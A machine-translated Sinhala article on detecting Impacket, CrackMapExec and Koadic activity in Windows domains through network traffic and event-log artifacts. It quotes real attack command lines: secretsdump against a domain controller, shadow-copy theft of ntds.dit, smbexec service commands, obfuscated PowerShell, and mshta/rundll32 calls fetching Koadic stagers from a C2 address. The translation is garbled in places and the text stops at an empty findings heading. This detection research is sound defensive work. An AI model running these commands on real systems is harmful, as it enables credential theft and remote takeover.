වින්ඩෝස් යටිතල ව්‍යුහයට එල්ල වන ප්‍රහාර හඳුනා ගන්නේ කෙසේද: හැකර් මෙවලම් අධ්‍යයනය කිරීම

ආයතනික අංශයේ ප්‍රහාර සංඛ්‍යාව සෑම වසරකම වර්ධනය වෙමින් පවතී: උදාහරණයක් ලෙස 2017 දී, 13% වැඩි අද්විතීය සිදුවීම් වාර්තා විය 2016 ට වඩා, සහ 2018 අවසානයේ - 27% වැඩි සිදුවීම්පෙර කාල සීමාවට වඩා. ප්‍රධාන වැඩ කරන මෙවලම වින්ඩෝස් මෙහෙයුම් පද්ධතිය වන ඒවා ඇතුළුව. 2017-2018 දී, APT Dragonfly, APT28, APT මඩ වතුර යුරෝපයේ, උතුරු ඇමරිකාවේ සහ සෞදි අරාබියේ රජයේ සහ හමුදා සංවිධානවලට ප්‍රහාර එල්ල කළේය. අපි මේ සඳහා මෙවලම් තුනක් භාවිතා කළා - පැකට්ටුව, CrackMapExec и කෝඩික්. ඔවුන්ගේ මූල කේතය විවෘතව පවතින අතර GitHub හි ඇත.

මෙම මෙවලම් මූලික විනිවිද යාම සඳහා භාවිතා නොකරන බව සඳහන් කිරීම වටී, නමුත් යටිතල පහසුකම් තුළ ප්රහාරයක් වර්ධනය කිරීමට. ප්‍රහාරකයින් පරිමිතිය විනිවිද යාමෙන් පසු ප්‍රහාරයේ විවිධ අවස්ථා වලදී ඒවා භාවිතා කරයි. මෙය, මාර්ගය වන විට, හඳුනා ගැනීමට අපහසු වන අතර බොහෝ විට තාක්ෂණයේ උපකාරයෙන් පමණි ජාල ගමනාගමනයේ සම්මුතියේ සලකුණු හඳුනා ගැනීම හෝ ඉඩ දෙන මෙවලම් ප්‍රහාරකයෙකු යටිතල ව්‍යුහය විනිවිද ගිය පසු ඔහුගේ ක්‍රියාකාරී ක්‍රියා හඳුනා ගන්න. මෙවලම් ගොනු මාරු කිරීමේ සිට රෙජිස්ට්‍රිය සමඟ අන්තර් ක්‍රියා කිරීම සහ දුරස්ථ යන්ත්‍රයක විධාන ක්‍රියාත්මක කිරීම දක්වා විවිධ කාර්යයන් සපයයි. ඔවුන්ගේ ජාල ක්‍රියාකාරකම් තීරණය කිරීම සඳහා අපි මෙම මෙවලම් පිළිබඳ අධ්‍යයනයක් සිදු කළෙමු.

අප කළ යුතු දේ:

• හැක් කිරීමේ මෙවලම් ක්‍රියා කරන ආකාරය තේරුම් ගන්න. ප්‍රහාරකයන්ට සූරාකෑමට අවශ්‍ය මොනවාද සහ ඔවුන්ට භාවිතා කළ හැකි තාක්ෂණයන් මොනවාදැයි සොයා බලන්න.
• ප්‍රහාරයක පළමු අදියරේදී තොරතුරු ආරක්ෂණ මෙවලම් මගින් අනාවරණය කර නොගත් දේ සොයා ගන්න. ප්‍රහාරකයා අභ්‍යන්තර ප්‍රහාරකයෙකු වන නිසා හෝ ප්‍රහාරකයා යටිතල ව්‍යුහයේ කලින් නොදැන සිටි සිදුරක් ගසාකන නිසා, ඔත්තු බැලීමේ අදියර මඟ හැරිය හැක. ඔහුගේ ක්‍රියාවන්හි සම්පූර්ණ දාමය යථා තත්වයට පත් කිරීමට හැකි වේ, එබැවින් තවදුරටත් චලනය හඳුනා ගැනීමට ඇති ආශාව.
• ආක්‍රමණය හඳුනාගැනීමේ මෙවලම් වලින් ව්‍යාජ ධනාත්මක දේ ඉවත් කරන්න. ඔත්තු බැලීමේ පදනම මත පමණක් යම් යම් ක්‍රියාවන් අනාවරණය කරගත් විට නිතර දෝෂ ඇතිවිය හැකි බව අප අමතක නොකළ යුතුය. සාමාන්‍යයෙන් යටිතල ව්‍යුහය තුළ ඕනෑම තොරතුරක් ලබා ගැනීමට ප්‍රමාණවත් ක්‍රම ගණනාවක් ඇත, බැලූ බැල්මට නීත්‍යානුකූල අයගෙන් වෙන්කර හඳුනාගත නොහැක.

මෙම මෙවලම් ප්‍රහාරකයන්ට ලබා දෙන්නේ කුමක්ද? මෙය Impacket නම්, ප්‍රහාරකයින්ට පරිමිතිය බිඳීමෙන් පසු ප්‍රහාරයේ විවිධ අවස්ථා වලදී භාවිතා කළ හැකි විශාල මොඩියුල පුස්තකාලයක් ලැබේ. බොහෝ මෙවලම් අභ්‍යන්තරව Impacket මොඩියුල භාවිතා කරයි - උදාහරණයක් ලෙස, Metasploit. එහි දුරස්ථ විධාන ක්‍රියාත්මක කිරීම සඳහා dcomexec සහ wmiexec, Impacket වෙතින් එකතු කරන මතකයෙන් ගිණුම් ලබා ගැනීම සඳහා රහස්‍ය ඩම්ප් ඇත. ප්රතිඵලයක් වශයෙන්, එවැනි පුස්තකාලයක ක්රියාකාරිත්වය නිවැරදිව හඳුනා ගැනීමෙන් ව්යුත්පන්නයන් හඳුනා ගැනීම සහතික කරනු ඇත.

CrackMapExec (හෝ සරලව CME) ගැන නිර්මාපකයින් "Powered by Impacket" ලිවීම අහම්බයක් නොවේ. මීට අමතරව, CME ජනප්‍රිය අවස්ථා සඳහා සූදානම් කළ ක්‍රියාකාරීත්වයක් ඇත: මුරපද හෝ ඒවායේ හෑෂ් ලබා ගැනීම සඳහා Mimikatz, දුරස්ථ ක්‍රියාත්මක කිරීම සඳහා Meterpreter හෝ Empire නියෝජිතයා ක්‍රියාත්මක කිරීම සහ Bloodhound නැවෙහි.

අපි තෝරාගත් තුන්වන මෙවලම Koadic. එය ඉතා මෑතක, එය 25 දී ජාත්‍යන්තර හැකර් සම්මන්ත්‍රණය DEFCON 2017 හිදී ඉදිරිපත් කරන ලද අතර එය සම්මත නොවන ප්‍රවේශයකින් කැපී පෙනේ: එය HTTP, Java Script සහ Microsoft Visual Basic Script (VBS) හරහා ක්‍රියා කරයි. මෙම ප්‍රවේශය භූමියෙන් පිටත ජීවත්වීම ලෙස හැඳින්වේ: මෙවලම වින්ඩෝස් තුළ ගොඩනගා ඇති පරායත්තතා සහ පුස්තකාල කට්ටලයක් භාවිතා කරයි. නිර්මාණකරුවන් එය COM Command & Control, හෝ C3 ලෙස හඳුන්වයි.

IMPACKET

AD තුළ ඔත්තු බැලීමේ සිට අභ්‍යන්තර MS SQL සේවාදායකයන්ගෙන් දත්ත රැස්කිරීමේ සිට අක්තපත්‍ර ලබා ගැනීමේ ශිල්පීය ක්‍රම දක්වා Impacket හි ක්‍රියාකාරීත්වය ඉතා පුළුල් වේ: මෙය SMB රිලේ ප්‍රහාරයක් වන අතර වසම් පාලකයකින් පරිශීලක මුරපද හැෂ් අඩංගු ntds.dit ගොනුව ලබා ගැනීම. Impacket විවිධ ක්‍රම හතරක් භාවිතා කරමින් දුරස්ථව විධාන ක්‍රියාත්මක කරයි: WMI, Windows Scheduler Management Service, DCOM, සහ SMB, සහ එසේ කිරීමට අක්තපත්‍ර අවශ්‍ය වේ.

Secretsdump

අපි බලමු secretsdump ගැන. මෙය පරිශීලක යන්ත්‍ර සහ වසම් පාලක යන දෙකම ඉලක්ක කළ හැකි මොඩියුලයකි. LSA, SAM, SECURITY, NTDS.dit යන මතක ප්‍රදේශ වල පිටපත් ලබා ගැනීමට එය භාවිතා කළ හැක, එබැවින් එය ප්‍රහාරයේ විවිධ අවස්ථා වලදී දැකිය හැකිය. මොඩියුලයේ ක්‍රියාකාරිත්වයේ පළමු පියවර වන්නේ SMB හරහා සත්‍යාපනය කිරීමයි, ඒ සඳහා පරිශීලකයාගේ මුරපදය හෝ එහි හැෂ් එක මගින් Pass the Hash ප්‍රහාරය ස්වයංක්‍රීයව සිදු කිරීමට අවශ්‍ය වේ. ඊළඟට සේවා පාලන කළමනාකරු (SCM) වෙත ප්‍රවේශය විවෘත කිරීමට සහ winreg ප්‍රොටෝකෝලය හරහා රෙජිස්ට්‍රිය වෙත ප්‍රවේශය ලබා ගැනීමට ඉල්ලීමක් පැමිණේ, ප්‍රහාරකයෙකුට උනන්දුවක් දක්වන ශාඛා වල දත්ත සොයා ගැනීමට සහ SMB හරහා ප්‍රතිඵල ලබා ගැනීමට එය භාවිතා කරයි.

රූපයේ. 1 Winreg ප්‍රොටෝකෝලය භාවිතා කරන විට, LSA සමඟ රෙජිස්ට්‍රි යතුරක් භාවිතයෙන් ප්‍රවේශය ලබා ගන්නේ කෙසේදැයි අපි දකිමු. මෙය සිදු කිරීම සඳහා, opcode 15 - OpenKey සමඟ DCERPC විධානය භාවිතා කරන්න.

සහල්. 1. winreg ප්‍රොටෝකෝලය භාවිතයෙන් රෙජිස්ට්‍රි යතුරක් විවෘත කිරීම

ඊළඟට, යතුරට ප්‍රවේශය ලබා ගත් විට, opcode 20 සමඟ SaveKey විධානය සමඟ අගයන් සුරකිනු ලැබේ. Impacket මෙය ඉතා නිශ්චිත ආකාරයකින් කරයි. එය .tmp සමඟ අමුණා ඇති අහඹු අක්ෂර 8 කින් යුත් ගොනුවකට අගයන් සුරකියි. මීට අමතරව, මෙම ගොනුව තවදුරටත් උඩුගත කිරීම System32 නාමාවලියෙන් SMB හරහා සිදු වේ (රූපය 2).

සහල්. 2. දුරස්ථ යන්ත්රයකින් රෙජිස්ට්රි යතුරක් ලබා ගැනීමේ යෝජනා ක්රමය

Winreg ප්‍රොටෝකෝලය, නිශ්චිත නම්, විධාන සහ ඒවායේ අනුපිළිවෙල භාවිතා කරමින් ඇතැම් රෙජිස්ට්‍රි ශාඛා වෙත විමසීම් මගින් ජාලයේ එවැනි ක්‍රියාකාරකම් හඳුනාගත හැකි බව පෙනේ.

මෙම මොඩියුලය වින්ඩෝස් සිදුවීම් ලොගය තුළ ද සලකුණු තබයි, එය හඳුනා ගැනීම පහසු කරයි. උදාහරණයක් ලෙස, විධානය ක්රියාත්මක කිරීමේ ප්රතිඵලයක් ලෙස

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 ලොගයේ අපි පහත දැක්වෙන ප්‍රධාන සිදුවීම් අනුපිළිවෙල දකිනු ඇත:

1. 4624 - දුරස්ථ පිවිසුම.
2. 5145 - winreg දුරස්ථ සේවාවට ප්‍රවේශ අයිතීන් පරීක්ෂා කිරීම.
3. 5145 - System32 නාමාවලියෙහි ගොනු ප්‍රවේශ අයිතීන් පරීක්ෂා කිරීම. ගොනුවේ ඉහත සඳහන් අහඹු නම ඇත.
4. 4688 - vssadmin දියත් කරන cmd.exe ක්‍රියාවලියක් නිර්මාණය කිරීම:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - විධානය සමඟ ක්‍රියාවලියක් නිර්මාණය කිරීම:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - විධානය සමඟ ක්‍රියාවලියක් නිර්මාණය කිරීම:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - විධානය සමඟ ක්‍රියාවලියක් නිර්මාණය කිරීම:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

බොහෝ පශ්චාත්-සූරාකෑමේ මෙවලම් මෙන්, Impacket හට දුරස්ථව විධාන ක්රියාත්මක කිරීම සඳහා මොඩියුල ඇත. අපි දුරස්ථ යන්ත්‍රයක අන්තර්ක්‍රියාකාරී විධාන කවචයක් සපයන smbexec වෙත අවධානය යොමු කරන්නෙමු. මෙම මොඩියුලයට මුරපදයක් හෝ මුරපද හැෂ් එකක් සමඟ SMB හරහා සත්‍යාපනය අවශ්‍ය වේ. රූපයේ. රූප සටහන 3 හි එවැනි මෙවලමක් ක්‍රියා කරන ආකාරය පිළිබඳ උදාහරණයක් අපි දකිමු, මෙම අවස්ථාවේදී එය ප්‍රාදේශීය පරිපාලක කොන්සෝලය වේ.

සහල්. 3. අන්තර් ක්රියාකාරී smbexec කොන්සෝලය

සත්‍යාපනය කිරීමෙන් පසු smbexec හි පළමු පියවර වන්නේ OpenSCManagerW විධානය (15) සමඟ SCM විවෘත කිරීමයි. විමසුම කැපී පෙනේ: MachineName ක්ෂේත්‍රය DUMMY වේ.

සහල්. 4. සේවා පාලන කළමනාකරු විවෘත කිරීමට ඉල්ලීම

ඊළඟට, CreateServiceW විධානය (12) භාවිතයෙන් සේවාව නිර්මාණය වේ. smbexec වලදී, අපට සෑම විටම එකම විධානය ගොඩනැගීමේ තර්කනය දැකිය හැකිය. රූපයේ. 5 කොළ පැහැයෙන් දැක්වෙන්නේ වෙනස් කළ නොහැකි විධාන පරාමිති, කහ පැහැයෙන් පෙන්නුම් කරන්නේ ප්‍රහාරකයෙකුට වෙනස් කළ හැකි දේ. ක්‍රියාත්මක කළ හැකි ගොනුවේ නම, එහි නාමාවලිය සහ ප්‍රතිදාන ගොනුව වෙනස් කළ හැකි බව දැකීම පහසුය, නමුත් ඉම්පැකට් මොඩියුලයේ තර්කනයට බාධා නොකර ඉතිරිය වෙනස් කිරීම වඩා දුෂ්කර ය.

සහල්. 5. සේවා පාලන කළමනාකරු භාවිතයෙන් සේවාවක් නිර්මාණය කිරීමට ඉල්ලීම

Smbexec වින්ඩෝස් සිදුවීම් ලොගය තුළ පැහැදිලි හෝඩුවාවන් ද තබයි. ipconfig විධානය සමඟ අන්තර්ක්‍රියාකාරී විධාන කවචය සඳහා Windows Server 2016 ලොගය තුළ, අපි පහත දැක්වෙන ප්‍රධාන සිදුවීම් අනුපිළිවෙල දකිනු ඇත:

1. 4697 - වින්දිතයාගේ යන්ත්රයේ සේවාව ස්ථාපනය කිරීම:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - 1 වන කරුණෙන් තර්ක සමඟ cmd.exe ක්‍රියාවලිය නිර්මාණය කිරීම.
3. 5145 - C$ නාමාවලියෙහි __ප්‍රතිදාන ගොනුවට ප්‍රවේශ හිමිකම් පරීක්ෂා කිරීම.
4. 4697 - වින්දිතයාගේ යන්ත්රයේ සේවාව ස්ථාපනය කිරීම.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - 4 වන කරුණෙන් තර්ක සමඟ cmd.exe ක්‍රියාවලිය නිර්මාණය කිරීම.
6. 5145 - C$ නාමාවලියෙහි __ප්‍රතිදාන ගොනුවට ප්‍රවේශ හිමිකම් පරීක්ෂා කිරීම.

ප්‍රහාරක මෙවලම් සංවර්ධනය සඳහා පදනම Impacket වේ. එය වින්ඩෝස් යටිතල ව්‍යුහයේ ඇති සියලුම ප්‍රොටෝකෝල සඳහා සහය දක්වන අතර ඒ සමඟම එහි ලාක්ෂණික ලක්ෂණ ඇත. මෙන්න විශේෂිත winreg ඉල්ලීම්, සහ ලාක්ෂණික විධාන සැකසීම සමඟ SCM API භාවිතය, සහ ගොනු නාම ආකෘතිය, සහ SMB share SYSTEM32 වේ.

CRACKMAPEXEC

CME මෙවලම මූලික වශයෙන් නිර්මාණය කර ඇත්තේ ප්‍රහාරකයෙකුට ජාලය තුළ ඉදිරියට යාමට සිදු කළ යුතු සාමාන්‍ය ක්‍රියා ස්වයංක්‍රීය කිරීම සඳහා ය. එය ඔබට සුප්‍රසිද්ධ එම්පයර් නියෝජිතයා සහ මීටරප්‍රෙටර් සමඟ එක්ව වැඩ කිරීමට ඉඩ සලසයි. විධාන රහසිගතව ක්‍රියාත්මක කිරීමට, CME ඒවා අපැහැදිලි කළ හැක. Bloodhound (වෙනම ඔත්තු බැලීමේ මෙවලමක්) භාවිතයෙන්, ප්‍රහාරකයෙකුට සක්‍රීය වසම් පරිපාලක සැසියක් සෙවීම ස්වයංක්‍රීය කළ හැක.

Bloodhound

Bloodhound, ස්වාධීන මෙවලමක් ලෙස, ජාලය තුළ උසස් ඔත්තු බැලීම් සඳහා ඉඩ සලසයි. එය පරිශීලකයන්, යන්ත්‍ර, කණ්ඩායම්, සැසි පිළිබඳ දත්ත රැස් කරන අතර PowerShell ස්ක්‍රිප්ට් හෝ ද්විමය ගොනුවක් ලෙස සපයනු ලැබේ. තොරතුරු රැස් කිරීම සඳහා LDAP හෝ SMB මත පදනම් වූ ප්‍රොටෝකෝල භාවිතා වේ. CME ඒකාබද්ධ කිරීමේ මොඩියුලය මඟින් Bloodhound වින්දිතයාගේ යන්ත්‍රයට බාගත කිරීමටත්, ක්‍රියාත්මක කිරීමෙන් පසු එකතු කරන ලද දත්ත ක්‍රියාත්මක කිරීමට සහ ලබා ගැනීමටත්, එමඟින් පද්ධතිය තුළ ක්‍රියා ස්වයංක්‍රීය කිරීමටත්, ඒවා අඩු අවධානයට ලක් කිරීමටත් ඉඩ සලසයි. Bloodhound චිත්‍රක කවචය එකතු කරන ලද දත්ත ප්‍රස්ථාර ආකාරයෙන් ඉදිරිපත් කරයි, එමඟින් ප්‍රහාරක යන්ත්‍රයේ සිට වසම් පරිපාලක වෙත කෙටිම මාර්ගය සොයා ගැනීමට ඔබට ඉඩ සලසයි.

සහල්. 6. Bloodhound අතුරුමුහුණත

වින්දිතයාගේ යන්ත්‍රය මත ධාවනය කිරීමට, මොඩියුලය ATSVC සහ SMB භාවිතයෙන් කාර්යයක් නිර්මාණය කරයි. ATSVC යනු Windows Task Scheduler සමඟ වැඩ කිරීම සඳහා වන අතුරු මුහුණතකි. CME ජාලය හරහා කාර්යයන් නිර්මාණය කිරීමට එහි NetrJobAdd(1) ශ්‍රිතය භාවිතා කරයි. CME මොඩියුලය යවන දේ පිළිබඳ උදාහරණයක් රූපයේ දැක්වේ. 7: මෙය cmd.exe විධාන ඇමතුමක් වන අතර XML ආකෘතියේ තර්ක ආකාරයෙන් අපැහැදිලි කේතයකි.

Fig.7. CME හරහා කාර්යයක් නිර්මාණය කිරීම

කාර්යය ක්‍රියාත්මක කිරීම සඳහා ඉදිරිපත් කිරීමෙන් පසු, වින්දිතයාගේ යන්ත්‍රය Bloodhound ආරම්භ කරන අතර මෙය ගමනාගමනය තුළ දැකිය හැකිය. මොඩියුලය සම්මත කණ්ඩායම් ලබා ගැනීම සඳහා LDAP විමසුම් මගින් සංලක්ෂිත වේ, වසමේ සියලුම යන්ත්‍ර සහ පරිශීලකයින්ගේ ලැයිස්තුවක්, සහ SRVSVC NetSessEnum ඉල්ලීම හරහා ක්‍රියාකාරී පරිශීලක සැසි පිළිබඳ තොරතුරු ලබා ගන්න.

සහල්. 8. SMB හරහා සක්‍රීය සැසි ලැයිස්තුවක් ලබා ගැනීම

මීට අමතරව, විගණනය සක්‍රීය කර ඇති වින්දිතයෙකුගේ යන්ත්‍රය මත Bloodhound දියත් කිරීම ID 4688 (ක්‍රියාවලි නිර්මාණය) සහ ක්‍රියාවලියේ නම සහිත සිදුවීමක් සමඟ ඇත. «C:WindowsSystem32cmd.exe». එහි කැපී පෙනෙන දෙය නම් විධාන රේඛා තර්ක:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts මොඩියුලය ක්‍රියාකාරීත්වය සහ ක්‍රියාත්මක කිරීමේ දෘෂ්ටි කෝණයෙන් ඉතා සිත්ගන්නා සුළුය. WMI ඔබට විවිධ Windows වස්තු වලින් දත්ත ලබා ගැනීමට WQL විමසුම් භාෂාව භාවිතා කිරීමට ඉඩ සලසයි, එය අත්‍යවශ්‍යයෙන්ම මෙම CME මොඩියුලය භාවිතා කරයි. එය වින්දිතයාගේ යන්ත්‍රයේ ස්ථාපනය කර ඇති ආරක්ෂණ මෙවලම් පිළිබඳව AntiSpywareProduct සහ AntiMirusProduct පන්ති වෙත විමසීම් ජනනය කරයි. අවශ්‍ය දත්ත ලබා ගැනීම සඳහා, මොඩියුලය rootSecurityCenter2 නාම අවකාශයට සම්බන්ධ වී පසුව WQL විමසුමක් ජනනය කර ප්‍රතිචාරයක් ලබා ගනී. රූපයේ. රූප සටහන 9 හි දැක්වෙන්නේ එවැනි ඉල්ලීම් සහ ප්‍රතිචාරවල අන්තර්ගතයයි. අපගේ උදාහරණයේදී, වින්ඩෝස් ඩිෆෙන්ඩර් සොයා ගන්නා ලදී.

සහල්. 9. enum_avproducts මොඩියුලයේ ජාල ක්‍රියාකාරකම්

බොහෝ විට, ඔබට WQL විමසුම් පිළිබඳ ප්‍රයෝජනවත් තොරතුරු සොයා ගත හැකි සිදුවීම් වලදී WMI විගණනය (Trace WMI-Activity) අක්‍රිය විය හැක. නමුත් එය සක්‍රීය කර ඇත්නම්, enum_avproducts ස්ක්‍රිප්ට් එක ක්‍රියාත්මක වන්නේ නම්, ID 11 සහිත Event එකක් සුරැකෙනු ඇත.එහි ඉල්ලීම එවූ පරිශීලකයාගේ නම සහ rootSecurityCenter2 නාම අවකාශයේ නම අඩංගු වේ.

සෑම CME මොඩියුලයකටම තමන්ගේම කෞතුක වස්තු තිබුණි, එය විශේෂිත WQL විමසුම් හෝ LDAP සහ SMB හි අපැහැදිලි සහ Bloodhound-විශේෂිත ක්‍රියාකාරකම් සහිත කාර්ය කාලසටහනක යම් ආකාරයක කාර්යයක් නිර්මාණය කිරීම විය හැකිය.

KOADIC

Koadic හි සුවිශේෂී ලක්ෂණයක් වන්නේ Windows තුළ ගොඩනගා ඇති JavaScript සහ VBScript පරිවර්තක භාවිතයයි. මෙම අර්ථයෙන්, එය ඉඩම් ප්‍රවණතාවයෙන් බැහැරව ජීවත්වීම අනුගමනය කරයි - එනම්, එයට බාහිර පරායත්තතා නොමැති අතර සම්මත වින්ඩෝස් මෙවලම් භාවිතා කරයි. මෙය සම්පූර්ණ විධාන සහ පාලනය (CnC) සඳහා වන මෙවලමකි, ආසාදනයෙන් පසු යන්ත්‍රය මත "implant" ස්ථාපනය කර ඇති අතර, එය පාලනය කිරීමට ඉඩ සලසයි. එවැනි යන්ත්රයක්, කෝඩික් පාරිභාෂිතය තුළ, "zombie" ලෙස හැඳින්වේ. වින්දිතයාගේ පැත්තෙන් සම්පූර්ණ ක්‍රියාකාරිත්වය සඳහා ප්‍රමාණවත් වරප්‍රසාද නොමැති නම්, පරිශීලක ගිණුම් පාලන බයිපාස් (UAC බයිපාස්) තාක්ෂණික ක්‍රම භාවිතයෙන් ඒවා ඉහළ නැංවීමට Koadic හට හැකියාව ඇත.

සහල්. 10. කෝඩික් ෂෙල්

වින්දිතයා අණ සහ පාලන සේවාදායකය සමඟ සන්නිවේදනය ආරම්භ කළ යුතුය. මෙය සිදු කිරීම සඳහා, ඇය කලින් සකස් කළ URI සම්බන්ධ කර ගත යුතු අතර එක් වේදිකාවක් භාවිතා කර ප්‍රධාන කෝඩික් ශරීරය ලබා ගත යුතුය. රූපයේ. රූප සටහන 11 mshta ස්ටේජරය සඳහා උදාහරණයක් පෙන්වයි.

සහල්. 11. CnC සේවාදායකය සමඟ සැසියක් ආරම්භ කිරීම

WS ප්‍රතිචාර විචල්‍යය මත පදනම්ව, ක්‍රියාත්මක කිරීම WScript.Shell හරහා සිදුවන බව පැහැදිලි වන අතර, STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE යන විචල්‍යයන් වත්මන් සැසියේ පරාමිතීන් පිළිබඳ ප්‍රධාන තොරතුරු අඩංගු වේ. CnC සේවාදායකයක් සමඟ HTTP සම්බන්ධතාවයක ඇති පළමු ඉල්ලීම්-ප්‍රතිචාර යුගලය මෙයයි. පසුකාලීන ඉල්ලීම් හැඳින්වෙන මොඩියුලවල (implants) ක්‍රියාකාරීත්වයට කෙලින්ම සම්බන්ධ වේ. සියලුම කෝඩික් මොඩියුල ක්‍රියා කරන්නේ CnC සමඟ ක්‍රියාකාරී සැසියක් සමඟ පමණි.

මිමිකට්ස්

CME Bloodhound සමඟ ක්‍රියා කරනවා සේම, Koadic Mimikatz සමඟ වෙනම වැඩසටහනක් ලෙස ක්‍රියා කරන අතර එය දියත් කිරීමට විවිධ ක්‍රම තිබේ. පහත දැක්වෙන්නේ Mimikatz implant බාගත කිරීම සඳහා ඉල්ලීම්-ප්‍රතිචාර යුගලයකි.

සහල්. 12. Mimikatz Koadic වෙත මාරු කරන්න

ඉල්ලීමේ URI ආකෘතිය වෙනස් වී ඇති ආකාරය ඔබට දැක ගත හැකිය. දැන් එහි csrf විචල්‍යය සඳහා අගයක් අඩංගු වේ, එය තෝරාගත් මොඩියුලයට වගකිව යුතුය. ඇගේ නමට අවධානය යොමු නොකරන්න; CSRF සාමාන්‍යයෙන් වෙනස් ලෙස තේරුම් ගන්නා බව අපි කවුරුත් දනිමු. ප්‍රතිචාරය වූයේ Mimikatz සම්බන්ධ කේතය එකතු කරන ලද Koadic හි ප්‍රධාන කොටසයි. එය තරමක් විශාලයි, එබැවින් අපි ප්රධාන කරුණු දෙස බලමු. මෙන්න අපි Mimikatz පුස්තකාලය Base64 හි කේතනය කර ඇත, එය එන්නත් කරන අනුක්‍රමික .NET පන්තියක් සහ Mimikatz දියත් කිරීමට තර්ක ඇත. ක්රියාත්මක කිරීමේ ප්රතිඵලය පැහැදිලි පාඨයෙන් ජාලය හරහා සම්ප්රේෂණය වේ.

සහල්. 13. දුරස්ථ යන්ත්රයක් මත Mimikatz ධාවනය කිරීමේ ප්රතිඵලය

Exec_cmd

Koadic ද විධාන දුරස්ථව ක්‍රියාත්මක කළ හැකි මොඩියුල ඇත. මෙහිදී අපි එකම URI උත්පාදන ක්‍රමය සහ හුරුපුරුදු sid සහ csrf විචල්‍යයන් දකිමු. exec_cmd මොඩියුලයේ දී, shell විධාන ක්‍රියාත්මක කළ හැකි ශරීරයට කේතය එකතු කරනු ලැබේ. පහත දැක්වෙන්නේ CnC සේවාදායකයේ HTTP ප්‍රතිචාරයේ අඩංගු එවැනි කේතයකි.

සහල්. 14. implant code exec_cmd

කේත ක්‍රියාත්මක කිරීම සඳහා හුරුපුරුදු WS ගුණාංගය සහිත GAWTUUGCFI විචල්‍යය අවශ්‍ය වේ. එහි ආධාරයෙන්, බද්ධ කිරීම ෂෙල් අමතයි, කේතයේ ශාඛා දෙකක් සැකසීම - shell.exec ප්රතිදාන දත්ත ප්රවාහය සහ ආපසු නොපැමිණීම සමඟ shell.run.

Koadic යනු සාමාන්‍ය මෙවලමක් නොවේ, නමුත් එයට නීත්‍යානුකූල ගමනාගමනය තුළ සොයා ගත හැකි තමන්ගේම පුරාවස්තු ඇත:

• HTTP ඉල්ලීම් විශේෂ ගොඩනැගීම,
• winHttpRequests API භාවිතා කරමින්,
• ActiveXObject හරහා WScript.Shell වස්තුවක් නිර්මාණය කිරීම,
• විශාල ක්රියාත්මක කළ හැකි ශරීරය.

ආරම්භක සම්බන්ධතාවය ආරම්භ කරනු ලබන්නේ ස්ටේජරය විසිනි, එබැවින් වින්ඩෝස් සිදුවීම් හරහා එහි ක්‍රියාකාරකම් හඳුනා ගත හැකිය. mshta සඳහා, මෙය සිදුවීම 4688 වේ, එය ආරම්භක ගුණාංගය සමඟ ක්‍රියාවලියක් නිර්මාණය කිරීම පෙන්නුම් කරයි:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic ක්‍රියාත්මක වන අතරතුර, ඔබට එය මනාව සංලක්ෂිත වන ගුණාංග සහිත වෙනත් සිදුවීම් 4688ක් දැකිය හැක:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

සොයා ගැනීම්

